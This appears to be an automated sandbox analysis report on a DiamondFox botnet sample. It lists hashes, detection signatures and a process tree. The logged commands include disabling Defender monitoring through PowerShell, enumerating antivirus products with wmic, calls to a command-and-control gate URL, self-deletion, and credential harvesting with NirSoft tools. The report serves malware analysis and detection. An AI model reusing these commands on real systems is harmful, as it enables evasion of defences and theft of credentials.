Analysis
-
max time kernel
126s -
max time network
168s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
04-07-2021 00:03
Static task
static1
Behavioral task
behavioral1
Sample
windef.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
windef.exe
Resource
win10v20210408
General
-
Target
windef.exe
-
Size
203KB
-
MD5
a1e165e1926c0c83123c89fce6b1af56
-
SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f
-
SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
-
SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
Malware Config
Signatures
-
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
DiamondFox payload 13 IoCs
Detects DiamondFox payload in file/memory.
Processes:
resource yara_rule \Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox \Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox \Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox -
NirSoft MailPassView 3 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral1/memory/2016-152-0x0000000000400000-0x0000000000455000-memory.dmp MailPassView behavioral1/memory/2016-153-0x000000000044412E-mapping.dmp MailPassView behavioral1/memory/2016-156-0x0000000000400000-0x0000000000455000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 3 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral1/memory/1636-136-0x00000000004466F4-mapping.dmp WebBrowserPassView behavioral1/memory/1636-135-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView behavioral1/memory/1636-139-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView -
Nirsoft 9 IoCs
Processes:
resource yara_rule behavioral1/memory/1636-136-0x00000000004466F4-mapping.dmp Nirsoft behavioral1/memory/1636-135-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft behavioral1/memory/1636-139-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft behavioral1/memory/1684-147-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft behavioral1/memory/1684-148-0x0000000000413E10-mapping.dmp Nirsoft behavioral1/memory/1684-151-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft behavioral1/memory/2016-152-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft behavioral1/memory/2016-153-0x000000000044412E-mapping.dmp Nirsoft behavioral1/memory/2016-156-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft -
Downloads MZ/PE file
-
Executes dropped EXE 10 IoCs
Processes:
MicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exelocalmgr.exepid process 1668 MicrosoftEdgeCPS.exe 1636 MicrosoftEdgeCPS.exe 1544 MicrosoftEdgeCPS.exe 1684 MicrosoftEdgeCPS.exe 2016 MicrosoftEdgeCPS.exe 824 MicrosoftEdgeCPS.exe 1052 MicrosoftEdgeCPS.exe 1664 MicrosoftEdgeCPS.exe 1220 MicrosoftEdgeCPS.exe 1704 localmgr.exe -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 1640 powershell.exe -
Loads dropped DLL 4 IoCs
Processes:
windef.exeMicrosoftEdgeCPS.exepid process 1072 windef.exe 1072 windef.exe 1668 MicrosoftEdgeCPS.exe 1668 MicrosoftEdgeCPS.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 8 IoCs
Processes:
MicrosoftEdgeCPS.exedescription pid process target process PID 1668 set thread context of 1636 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 set thread context of 1544 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 set thread context of 1684 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 set thread context of 2016 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 set thread context of 824 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 set thread context of 1052 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 set thread context of 1664 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 set thread context of 1220 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2028 taskkill.exe 1212 taskkill.exe 1564 taskkill.exe 1980 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 644 notepad.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exepid process 284 powershell.exe 1640 powershell.exe 284 powershell.exe 1640 powershell.exe 1668 MicrosoftEdgeCPS.exe 1636 MicrosoftEdgeCPS.exe 1636 MicrosoftEdgeCPS.exe 1668 MicrosoftEdgeCPS.exe 1668 MicrosoftEdgeCPS.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wmic.exepowershell.exepowershell.exewmic.exedescription pid process Token: SeIncreaseQuotaPrivilege 1424 wmic.exe Token: SeSecurityPrivilege 1424 wmic.exe Token: SeTakeOwnershipPrivilege 1424 wmic.exe Token: SeLoadDriverPrivilege 1424 wmic.exe Token: SeSystemProfilePrivilege 1424 wmic.exe Token: SeSystemtimePrivilege 1424 wmic.exe Token: SeProfSingleProcessPrivilege 1424 wmic.exe Token: SeIncBasePriorityPrivilege 1424 wmic.exe Token: SeCreatePagefilePrivilege 1424 wmic.exe Token: SeBackupPrivilege 1424 wmic.exe Token: SeRestorePrivilege 1424 wmic.exe Token: SeShutdownPrivilege 1424 wmic.exe Token: SeDebugPrivilege 1424 wmic.exe Token: SeSystemEnvironmentPrivilege 1424 wmic.exe Token: SeRemoteShutdownPrivilege 1424 wmic.exe Token: SeUndockPrivilege 1424 wmic.exe Token: SeManageVolumePrivilege 1424 wmic.exe Token: 33 1424 wmic.exe Token: 34 1424 wmic.exe Token: 35 1424 wmic.exe Token: SeDebugPrivilege 284 powershell.exe Token: SeDebugPrivilege 1640 powershell.exe Token: SeIncreaseQuotaPrivilege 1424 wmic.exe Token: SeSecurityPrivilege 1424 wmic.exe Token: SeTakeOwnershipPrivilege 1424 wmic.exe Token: SeLoadDriverPrivilege 1424 wmic.exe Token: SeSystemProfilePrivilege 1424 wmic.exe Token: SeSystemtimePrivilege 1424 wmic.exe Token: SeProfSingleProcessPrivilege 1424 wmic.exe Token: SeIncBasePriorityPrivilege 1424 wmic.exe Token: SeCreatePagefilePrivilege 1424 wmic.exe Token: SeBackupPrivilege 1424 wmic.exe Token: SeRestorePrivilege 1424 wmic.exe Token: SeShutdownPrivilege 1424 wmic.exe Token: SeDebugPrivilege 1424 wmic.exe Token: SeSystemEnvironmentPrivilege 1424 wmic.exe Token: SeRemoteShutdownPrivilege 1424 wmic.exe Token: SeUndockPrivilege 1424 wmic.exe Token: SeManageVolumePrivilege 1424 wmic.exe Token: 33 1424 wmic.exe Token: 34 1424 wmic.exe Token: 35 1424 wmic.exe Token: SeIncreaseQuotaPrivilege 1112 wmic.exe Token: SeSecurityPrivilege 1112 wmic.exe Token: SeTakeOwnershipPrivilege 1112 wmic.exe Token: SeLoadDriverPrivilege 1112 wmic.exe Token: SeSystemProfilePrivilege 1112 wmic.exe Token: SeSystemtimePrivilege 1112 wmic.exe Token: SeProfSingleProcessPrivilege 1112 wmic.exe Token: SeIncBasePriorityPrivilege 1112 wmic.exe Token: SeCreatePagefilePrivilege 1112 wmic.exe Token: SeBackupPrivilege 1112 wmic.exe Token: SeRestorePrivilege 1112 wmic.exe Token: SeShutdownPrivilege 1112 wmic.exe Token: SeDebugPrivilege 1112 wmic.exe Token: SeSystemEnvironmentPrivilege 1112 wmic.exe Token: SeRemoteShutdownPrivilege 1112 wmic.exe Token: SeUndockPrivilege 1112 wmic.exe Token: SeManageVolumePrivilege 1112 wmic.exe Token: 33 1112 wmic.exe Token: 34 1112 wmic.exe Token: 35 1112 wmic.exe Token: SeIncreaseQuotaPrivilege 1112 wmic.exe Token: SeSecurityPrivilege 1112 wmic.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
MicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exepid process 1544 MicrosoftEdgeCPS.exe 1052 MicrosoftEdgeCPS.exe 1664 MicrosoftEdgeCPS.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
windef.exeMicrosoftEdgeCPS.exedescription pid process target process PID 1072 wrote to memory of 1668 1072 windef.exe MicrosoftEdgeCPS.exe PID 1072 wrote to memory of 1668 1072 windef.exe MicrosoftEdgeCPS.exe PID 1072 wrote to memory of 1668 1072 windef.exe MicrosoftEdgeCPS.exe PID 1072 wrote to memory of 1668 1072 windef.exe MicrosoftEdgeCPS.exe PID 1072 wrote to memory of 1640 1072 windef.exe powershell.exe PID 1072 wrote to memory of 1640 1072 windef.exe powershell.exe PID 1072 wrote to memory of 1640 1072 windef.exe powershell.exe PID 1072 wrote to memory of 1640 1072 windef.exe powershell.exe PID 1668 wrote to memory of 284 1668 MicrosoftEdgeCPS.exe powershell.exe PID 1668 wrote to memory of 284 1668 MicrosoftEdgeCPS.exe powershell.exe PID 1668 wrote to memory of 284 1668 MicrosoftEdgeCPS.exe powershell.exe PID 1668 wrote to memory of 284 1668 MicrosoftEdgeCPS.exe powershell.exe PID 1668 wrote to memory of 1424 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 1424 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 1424 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 1424 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 1112 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 1112 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 1112 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 1112 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 1684 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 1684 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 1684 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 1684 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 1072 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 1072 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 1072 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 1072 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 300 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 300 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 300 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 300 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 864 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 864 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 864 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 864 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 956 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 956 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 956 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 956 1668 MicrosoftEdgeCPS.exe wmic.exe PID 1668 wrote to memory of 1636 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1636 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1636 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1636 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1636 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1636 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1636 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1636 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1636 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1636 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1544 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1544 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1544 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1544 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1544 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1544 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1544 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1544 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1684 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1684 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1684 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1684 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1684 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 1668 wrote to memory of 1684 1668 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\windef.exe"C:\Users\Admin\AppData\Local\Temp\windef.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" os get caption /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get caption /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\1.log"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\4.log"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\2.log"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\3.log"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
-
C:\Windows\notepad.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\write.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 824 /F3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 1052 /F3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 1664 /F3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 1220 /F3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵
-
C:\Users\Admin\AppData\Local\Temp\localmgr.exe"C:\Users\Admin\AppData\Local\Temp\localmgr.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\windef.exe' -Force -Recurse2⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1602f747-c1a3-4345-8dec-4dcb8b1f72e5MD5
02ff38ac870de39782aeee04d7b48231
SHA10390d39fa216c9b0ecdb38238304e518fb2b5095
SHA256fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876
SHA51224a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d686436-375c-4ee1-bd4a-9e44ccd248baMD5
75a8da7754349b38d64c87c938545b1b
SHA15c28c257d51f1c1587e29164cc03ea880c21b417
SHA256bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96
SHA512798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4375eeb7-a65d-43f1-a616-02c5ad6c5370MD5
be4d72095faf84233ac17b94744f7084
SHA1cc78ce5b9c57573bd214a8f423ee622b00ebb1ec
SHA256b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc
SHA51243856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fe5bd95-2cea-4aea-9c8c-dd67bac4295bMD5
df44874327d79bd75e4264cb8dc01811
SHA11396b06debed65ea93c24998d244edebd3c0209d
SHA25655de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181
SHA51295dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc2fe8ee-69c0-48ce-8821-1fab80ab4eebMD5
597009ea0430a463753e0f5b1d1a249e
SHA14e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62
SHA2563fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d
SHA5125d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa12b0a1-3d6a-4bab-a74a-253a75ca0598MD5
5e3c7184a75d42dda1a83606a45001d8
SHA194ca15637721d88f30eb4b6220b805c5be0360ed
SHA2568278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59
SHA512fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd9bf4da-ec38-4847-85c5-d50f35796d4cMD5
a725bb9fafcf91f3c6b7861a2bde6db2
SHA18bb5b83f3cc37ff1e5ea4f02acae38e72364c114
SHA25651651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431
SHA5121c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe80cd26-0cf7-4e38-9884-6dab53b04ca9MD5
b6d38f250ccc9003dd70efd3b778117f
SHA1d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a
SHA2564de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265
SHA51267d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
19ff3cb6ea3c288c2056d4cf611d3479
SHA1cfe0d68b358dac37f14de0ec3c8ab070945d412a
SHA2565de04cda047c74cdad37bf6c95de02bba8ac88642f836dc3f5842c02940f5c6e
SHA5123bc886faefccd7cd5069c2703b18cab44d4f021f9cceebe59de4c979fdae2026edf66fa2c97b3902e6a3f177705870c5831fdf5174f22b6200d909b8a1985111
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
c9974c72aeb2e34aee7aacaae77f8fde
SHA1fbebecc790d96055fa5e9d181ef6186181d67cc8
SHA256f200623df5d54101febe1cd0455f024a21904e1ffa1572401cc4c1e10fcbe56c
SHA51237ffd4d8dc524f9a35afdf9664c90286a7c42c4039757dc2ab587b18923ad2fa2b3876aa59b4dafa042d3859a5537d60ed2133914746889ddf12367cd0eb0992
-
C:\Users\Admin\AppData\Local\Temp\localmgr.exeMD5
f4f7f1f8b8f893bdd621f425646919a5
SHA1cc1ccc560723692407ce86972865a956faa62229
SHA256fd8ef0b8b997038aa6a4a416298965545e24f6367e364e58ebd6343515b73c8a
SHA5127621478e0d0e3036682e76e7db3675d5053a4decff033d75c9608744245b91b970a937f3006f80c6262408f8072b06b74af606c88d4c9a951eda88320275fc03
-
C:\Users\Admin\AppData\Local\Temp\localmgr.exeMD5
f4f7f1f8b8f893bdd621f425646919a5
SHA1cc1ccc560723692407ce86972865a956faa62229
SHA256fd8ef0b8b997038aa6a4a416298965545e24f6367e364e58ebd6343515b73c8a
SHA5127621478e0d0e3036682e76e7db3675d5053a4decff033d75c9608744245b91b970a937f3006f80c6262408f8072b06b74af606c88d4c9a951eda88320275fc03
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
